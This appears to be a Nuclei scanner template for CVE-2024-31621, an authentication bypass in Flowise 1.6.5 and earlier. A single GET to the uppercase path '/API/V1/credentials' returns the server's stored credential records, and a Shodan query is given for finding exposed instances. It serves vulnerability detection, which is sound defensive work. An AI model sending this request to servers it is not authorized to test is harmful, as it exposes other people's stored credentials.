id: CVE-2024-31621 info: name: Flowise 1.6.5 - Authentication Bypass author: DhiyaneshDK severity: high description: | The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability. reference: - https://www.exploit-db.com/exploits/52001 - https://github.com/FlowiseAI/Flowise/releases - https://flowiseai.com/ classification: epss-score: 0.00381 epss-percentile: 0.72907 metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:-2051052918 tags: cve,cve2024,auth-bypass,flowise http: - method: GET path: - "{{BaseURL}}/API/V1/credentials" matchers-condition: and matchers: - type: word part: body words: - '"credentialName":' - '"updatedDate":' condition: and - type: status status: - 200 # digest: 4a0a00473045022100855b41a796131b8698eb12f78f117662e6af38aa8fcb1b42a37c4632b6c435900220650b6ae50a13b556b12b96269eb1d8e840cb3d4cc47a5667bcbc6e030cf4ff56:922c64590222798bb761d5b6d8e72950